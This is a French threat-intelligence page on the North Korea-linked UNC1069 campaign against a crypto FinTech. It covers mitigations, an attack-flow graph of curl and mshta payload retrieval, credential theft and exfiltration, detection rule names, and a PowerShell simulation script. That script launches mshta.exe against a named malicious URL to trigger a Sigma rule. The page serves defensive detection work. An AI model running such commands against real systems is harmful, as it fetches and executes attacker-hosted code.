UNC1069 cible le secteur des cryptomonnaies avec de nouveaux outils et de l’ingénierie sociale assistée par IA
Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
UNC1069, lié à la Corée du Nord, a ciblé une FinTech cryptographique en utilisant une intrusion multi-étapes combinant une vidéo deepfake générée par IA, des comptes Telegram compromis, et une fausse réunion Zoom pour pousser les victimes à exécuter des commandes malveillantes.
Enquête
Mandiant a identifié sept familles de malwares sur un hôte macOS, y compris les nouveaux SILENCELIFT, DEEPBREATH, et CHROMEPUSH, ainsi que le téléchargeur connu SUGARLOADER. La chaîne a commencé par une commande de type ClickFix qui récupérait une charge utile depuis un domaine malveillant, puis s’est déplacée à travers des chargeurs et des portes dérobées qui volaient des identifiants, des données de navigateur, et du contenu de messagerie. Les étapes ultérieures utilisaient l’exécution modulaire en mémoire pour minimiser les traces sur le disque.
Atténuation
Renforcez la vérification sur les canaux d’ingénierie sociale, restreignez l’exécution des scripts non signés, et surveillez l’utilisation anormale de curl ou mshta. Sur macOS, appliquez le contrôle de signature de code et des services lance-démon, et auditez les permissions TCC et les répertoires des hôtes de messagerie native pour les fichiers inconnus.
Réponse
Isolez le point de terminaison, préservez les artefacts en ligne de commande, récupérez le fichier plist du lance-démon malveillant, et bloquez tous les domaines C2 identifiés. Réinitialisez les identifiants de trousseau, de navigateur, et de Telegram, et complétez un balayage pour les chargeurs résiduels. Examinez les comptes affectés pour un accès non autorisé et coordonnez la contention.
"graph TB %% Définition des classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nœuds action_initial_access["<b>Action</b> – <b>T1204.001 Exécution par utilisateur</b>: Lien malveillant livré via un compte Telegram compromis et une réunion Zoom usurpée<br/><b>Description</b>: La victime a copié et exécuté des chaînes de commande"] class action_initial_access action tool_telegram["<b>Outil</b> – <b>Nom</b>: Telegram (compromis)<br/><b>Rôle</b>: Canal de distribution pour le lien malveillant"] class tool_telegram tool tool_zoom["<b>Outil</b> – <b>Nom</b>: Zoom (réunion usurpée)<br/><b>Rôle</b>: Vecteur d’ingénierie sociale"] class tool_zoom tool action_execution_unix_shell["<b>Action</b> – <b>T1059.004 Shell Unix</b>: Exécuter la commande curl via zsh pour télécharger WAVESHAPER<br/><b>Description</b>: Télécharge et exécute une porte dérobée"] class action_execution_unix_shell action tool_curl["<b>Outil</b> – <b>Nom</b>: curl<br/><b>Objectif</b>: Récupérer la charge utile distante"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Nom</b>: WAVESHAPER<br/><b>Fonction</b>: Porte dérobée téléchargée et exécutée"] class malware_waveshaper malware action_execution_mshta["<b>Action</b> – <b>T1218.005 Exécution de proxy Mshta</b>: Utiliser mshta pour récupérer et exécuter le téléchargeur HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Outil</b> – <b>Nom</b>: mshta<br/><b>Objectif</b>: Exécuter une application HTML distante"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Nom</b>: HYPERCALL<br/><b>Fonction</b>: Téléchargeur exécuté via mshta"] class malware_hypercall malware process_launch_daemon["<b>Processus</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Objectif</b>: Exécute SUGARLOADER au démarrage du système"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Nom</b>: SUGARLOADER<br/><b>Fonction</b>: Composant persistant"] class malware_sugarloader malware action_defense_evasion["<b>Action</b> – <b>T1027.004 Compiler après livraison</b>: Chiffrer la configuration avec RC4 pour cacher les URLs C2"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Nom</b>: DEEPBREATH<br/><b>Capacités</b>: Accès aux trousseaux et aux stockages de navigateurs"] class malware_deepbreath malware action_cred_keychain["<b>Action</b> – <b>T1555.001 Trousseau</b>: Extraire les identifiants du trousseau macOS"] class action_cred_keychain action action_cred_browser["<b>Action</b> – <b>T1555.003 Navigateurs Web</b>: Extraire les cookies, connexions, extensions de Chrome Brave Edge"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Nom</b>: CHROMEPUSH<br/><b>Capacité</b>: Keylogger d’extension de navigateur"] class malware_chromepush malware action_keylogging["<b>Action</b> – <b>T1056.001 Enregistrement de frappe</b>: Capturer les frappes via une extension malveillante"] class action_keylogging action action_local_staging["<b>Action</b> – <b>T1074.001 Mise en scène de données locales</b>: Stocker les données collectées dans des répertoires temporaires"] class action_local_staging action action_remote_staging["<b>Action</b> – <b>T1074.002 Mise en scène de données à distance</b>: Télécharger les données mises en scène vers C2 en utilisant curl"] class action_remote_staging action action_c2_http["<b>Action</b> – <b>T1102.003 Service Web One-Way</b>: Envoyer les données exfiltrées via HTTP POST"] class action_c2_http action action_exfiltration["<b>Action</b> – <b>T1020 Exfiltration automatisée</b>: Téléchargement automatisé de données vers les serveurs C2"] class action_exfiltration action %% Connexions action_initial_access –>|utilise| tool_telegram tool_telegram –>|livre le lien vers| tool_zoom tool_zoom –>|mène à| action_execution_unix_shell action_execution_unix_shell –>|exécute| tool_curl tool_curl –>|télécharge| malware_waveshaper malware_waveshaper –>|déclenche| action_defense_evasion action_initial_access –>|déclenche également| action_execution_mshta action_execution_mshta –>|utilise| tool_mshta tool_mshta –>|récupère| malware_hypercall malware_hypercall –>|installe| process_launch_daemon process_launch_daemon –>|démarre| malware_sugarloader malware_sugarloader –>|charge| malware_deepbreath malware_deepbreath –>|effectue| action_cred_keychain malware_deepbreath –>|effectue| action_cred_browser malware_deepbreath –>|installe| malware_chromepush malware_chromepush –>|exécute| action_keylogging action_keylogging –>|stocke les données dans| action_local_staging action_local_staging –>|télécharge via curl vers| action_remote_staging action_remote_staging –>|envoie les données à| action_c2_http action_c2_http –>|facilite| action_exfiltration %% Assignations de classes class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Flux d’attaque
Détections
Tentative d’énumération possible System_profiler (via process_creation)
Voir
Comportement suspect d’évitement de défense LOLBAS MSHTA par détection de commandes associées (via process_creation)
Voir
Tentative possible d’énumération des mises à jour système (via process_creation)
Voir
Tentative d’exécution suspecte de Curl [MacOS] (via cmdline)
Voir
PnPtUtil pour l’énumération des appareils (via cmdline)
Voir
Énumération système possible (via cmdline)
Voir
IOCs (HashMd5) pour détecter : UNC1069 cible le secteur des cryptocurrences avec de nouveaux outils et ingénierie sociale activée par IA
Voir
IOCs (HashSha256) pour détecter : UNC1069 cible le secteur des cryptocurrences avec de nouveaux outils et ingénierie sociale activée par IA
Voir
Vecteur d’infection UNC1069 MacOS via ClickFix [Création de processus Linux]
Voir
Exécution de commande d’attaque UNC1069 ClickFix [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : La vérification préliminaire de la télémétrie et de la base de référence doit être validée.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narrative de l’attaque et commandes :
L’adversaire, ayant obtenu une première entrée via un email de phishing, exploitemshtapour récupérer une application HTML malveillante depuishttps://mylingocoin.com/audio/fix/6454694440. Ce fichier HTA contient une charge utile PowerShell qui installe un mineur de cryptomonnaie. Avant de lancer le HTA, l’attaquant exécutesetx audio_volume 100pour s’assurer que le sous-système audio est dans un état connu (certaines variantes de la campagne ClickFix manipulent les paramètres audio pour cacher les pop-ups). Les deux commandes sont exécutées directement dans une console PowerShell, produisant des champs CommandLine qui correspondent exactement à la règle Sigma. -
Script de test de régression :
# Simulation d'attaque UNC1069 ClickFix – déclenche la règle Sigma # Étape 1 : Persister une variable d'environnement d'apparence bénigne (correspond à la détection) setx audio_volume 100 # Étape 2 : Exécuter un HTA malveillant – URL exacte utilisée dans la détection de la règle $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Optionnel : attendre quelques secondes pour le lancement du HTA Start-Sleep -Seconds 5 -
Commandes de nettoyage :
# Supprimer la variable d'environnement définie précédemment reg delete "HKCUEnvironment" /v "audio_volume" /f # Terminer tous les processus mshta résiduels créés par le test Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force